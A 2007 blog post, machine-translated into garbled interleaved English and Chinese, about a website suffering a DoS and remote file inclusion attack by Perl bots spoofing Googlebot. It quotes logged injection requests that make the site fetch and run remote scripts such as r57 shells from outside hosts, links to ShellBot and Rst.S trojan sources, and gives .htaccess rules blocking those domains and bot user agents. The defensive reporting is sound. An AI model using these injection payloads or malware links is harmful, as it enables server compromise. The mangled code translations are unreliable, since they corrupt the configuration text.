质谱远程代码注射液作为Googlebot会-包欺骗的P erl僵尸和木马

- Dec 12月
- 21 21
质谱远程代码注射液作为Googlebot会-包欺骗的P erl僵尸和木马
发布者诺亚方舟 10个月， 2周前。
Filed under Security & injection .根据提交的安全与注射。
- Increase text size 增加文字大小
- Decrease text size 减少文字大小
这个过去的三天里本博客正在遭受DOS攻击。这次袭击还活着，现在我不认为他们会尚未离开。
本人不能禁止这种机器人，他们直接发送伪造数据包（包欺骗）作为Googlebot会 http://www.whois-search.com/whois/64.233.166.136 。 Im still looking for the right ISP.林仍在寻找合适的ISP 。
```
 OrgName: Google Inc. OrgName ：谷歌公司 
 OrgID: GOGL OrgID ：戈格尔 
 Address: 1600 Amphitheatre Parkway地址： 1600剧场百汇 
 City: Mountain View城市：山景 
 StateProv: CA StateProv ：加利福尼亚州 
 PostalCode: 94043邮政编码： 94043 
 Country: US国家：美国 
```
当时本人正在封锁所有远程溪流从他们随机东道国*. com和“僵尸perl的签字” ，但不会阻止阻止他们锤击这个网站。我将派出503 （服务不可用）的某些要求，如果您有问题，访问这个网站，请稍后再检查。
Type of injections注射型
有很多参数开放在我的日志（我将禁用服务器日志-限制资源），他们可能有大量库存检查名单的已知不育系的弱点。我只能确认，它是一种blackhat瑞垃圾邮件僵尸因为他们请求包括典型order.php页。
```
 /es/wordpress/how-to-removed-wordpress-net-in-spam-injection-infected-by-mike-ja /方块/ WordPress的/如何以删除， WordPress的网中的垃圾邮件注射感染通过麦克风子 
  gger-goro-class-mailphp/order.php/?wp=http://hom3.t35.com/xpl/hack/id.txt? gger-goro-class-mailphp/order.php / ？可湿性粉剂= http://hom3.t35.com/xpl/hack/id.txt ？ 
 /es/wordpress/order.php/?wp=http://hom3.t35.com/xpl/hack/id.txt? /方块/ WordPress的/ order.php / ？可湿性粉剂= http://hom3.t35.com/xpl/hack/id.txt ？ 
 /order.php?wp=http://hom3.t35.com/xpl/hack/id.txt? / order.php ？可湿性粉剂= http://hom3.t35.com/xpl/hack/id.txt ？ 
```
要查看下面的源你需要排除主机网站从您的防病毒程序。
- 的Perl / ShellBot.B木马 -h ttp://hom3.t35.com/xpl/fidz/hack/bnc.txt
- 的PHP / Rst.S木马 -h ttp://hom3.t35.com/xpl/fidz
htaccess阻止坏码喷油器和Perl博特（僵尸网络）
If you has similar problems.如果您也有类似的问题。你应该块下面的域名在您的htaccess 。
mod_setenvif
```
 SetEnvIfNoCase Referer "^http://(www.)?t35\.com" codeinjector_ref=1 SetEnvIfNoCase参考“ ^ http:// （为www ） ？ t35 \ 。 com ”域名codeinjector_ref = 1 
 SetEnvIfNoCase Referer "^http://(www.)?jorgevolio\.com" codeinjector_ref=1 SetEnvIfNoCase参考“ ^ http:// （为www ） ？ jorgevolio \ 。 com ”域名codeinjector_ref = 1 
 SetEnvIfNoCase Referer "^http://(www.)?emabe\.com" codeinjector_ref=1 SetEnvIfNoCase参考“ ^ http:// （为www ） ？ emabe \ 。 com ”域名codeinjector_ref = 1 
 SetEnvIfNoCase Referer "^http://(www.)?pawang\.in" codeinjector_ref=1 SetEnvIfNoCase参考“ ^ http:// （为www ） ？ pawang \ 。在” codeinjector_ref = 1 
 SetEnvIfNoCase Referer "^http://(www.)?gw-gold\.net" codeinjector_ref=1 SetEnvIfNoCase参考“ ^ http:// （为www ） ？毛重金\ 。净” codeinjector_ref = 1 
 SetEnvIfNoCase User-Agent "^libwww-perl*" shell_bots=1 SetEnvIfNoCase用户代理“ ^ libwww - perl的* ” shell_bots = 1 
 SetEnvIfNoCase User-Agent "^Amidalla*" shell_bots=1 SetEnvIfNoCase用户代理“ ^ Amidalla * ” shell_bots = 1 

 <FilesMatch "(.*)"> <FilesMatch "(.*)"> 
 Order Allow,Deny为了允许，否认 
 Allow from all允许从所有 
 Deny from env=codeinjector_ref拒绝从包膜= codeinjector_ref 
 Deny from env=shell_bots拒绝从包膜= shell_bots 
 </FilesMatch> “ / FilesMatch ” 
```
如果ü arent如果您务必服务器的支持mod_setenvif总结像下面的例子。
```
 <IfModule mod_setenvif.c> <IfModule mod_setenvif.c> 
 #...replace this line with the above code... ＃ ...取代此行与上面的代码... 
 </IfModule> “ / IfModule ” 
```
How to trap Perl Shell Bot如何陷阱的Perl壳牌博特
We need a pattern to trap this bots.我们需要一个模式，这个机器人陷阱。 certainly we knew that these bots :当然我们知道，这些漫游：
- doesn’t honor robot.txt没有荣誉robot.txt
- they crawl all subdirectory他们检索所有子目录
- they has a pattern URI request他们有一个模式的URI请求
现在我只能建立子目录自动禁止（和一些其他的东西）根据他们的模式。 Alexa的僵尸将禁止他们也不要荣誉robot.txt 。
我会更新这个职位时有发生。不要检查有关条款对如何包欺骗和验证建立/欺骗数据包。
Recent Scan & Update最近的扫描和更新
The below list is automatically added.下面的清单是自动加入。
December 24, 2007 2007年12月24日
ip地址： 64.26.63.10参数： 登录= ， ？注入： http://pawang.in/r57.txt
December 24, 2007 2007年12月24日
ip地址： 64.26.63.10参数： 目录= ，登录=注入： http://pawang.in/r57.txt ？？？？
December 25, 2007 2007年12月25号
ip地址： 59.158.128.138参数： P值 ， ： allinurl =注入： http://gw-gold.net/jpg/pictures/test.txt
External Resources外部资源
- 包欺骗-h ttp://www.wireshark.org
- pcapdiff伪造的数据包验证http://www.eff.org/testyourisp/pcapdiff/
About the Author作者简介
Tags: 标签：
- Amidalla , Amidalla ，
- libwww-perl , libwww - perl的，
- owned , 国有，
- packet spoofing , 包欺骗，
- PHP Rst.S , 的PHP Rst.S ，
- ShellBot.B , ShellBot.B ，
- Trojan , 木马，
- wp 可湿性粉剂
- Rated 3额定第3
- December 21, 2007 at 10:48 pm 07年12月21日在下午10时48分
- February 16, 2008 at 3:05 am 2008年2月16号在上午03时05
- 0.3
- url网址
- 没有回应 “地下远程代码注射液作为Googlebot会-包欺骗的P erl僵尸和木马”
  Trackback URL: 引用网址：使用引用网址↑以平本条。如果您的博客不支持搬场您可能想要发表评论代替。
- Comment Policy 评论政策
  稀土：大众远程代码注射液作为Googlebot会-包欺骗的P erl僵尸和木马- '指南'↓
  质谱远程代码注射液作为Googlebot会-包欺骗的P erl僵尸和木马K akkoi1 0个月， 2周前5 网址
  下面的“守则”旨在保护您和其他用户的这个网站。
  相关：您的评论应该是一个深思熟虑的贡献的主题项目。让您的建设性意见和礼貌。
  没有广告或垃圾邮件：不要使用评论功能，以促进商业实体/产品，公司服务或网站。您可以张贴一个链接，只要它的相关条目。
  请在法律范围内：不要链接到攻击性或非法内容的网站。不要让任何诽谤或诋毁评论可能损害声誉的人或组织。
  隐私：请勿张贴任何个人信息与自己或别人-（即：地址，就业地点，电话或手机号码或电子邮件地址）。
  为了使这些经验，愉快的和令人感兴趣的所有的用户，我们请您按照上述guidlines 。
  be the first to comment.首先评论。
  随时进行，询问问题，并告诉我们您的想法！经常和有见地的评论是最值得欢迎的。
“写的，如果你跟一个好朋友（前面的你的母亲）。 ”
.have your say 。您说

Name (required) 名称（必需）
Email (required, will not be published) 电子邮件（必要时将不会被发表）
Website 网站
声明：对于任何内容，您后，您在此授予Kakkoi的免版税的，不可撤销的，永久性，排他性和充分转授的许可使用，复制，修改，改编，出版，翻译，创造衍生作品，分发，执行和显示这些内容的全部或部分，全世界范围内，并把它在其他作品，以任何形式，媒体或技术现在已知或以后开发。一些版权所有。

MySQL查询错误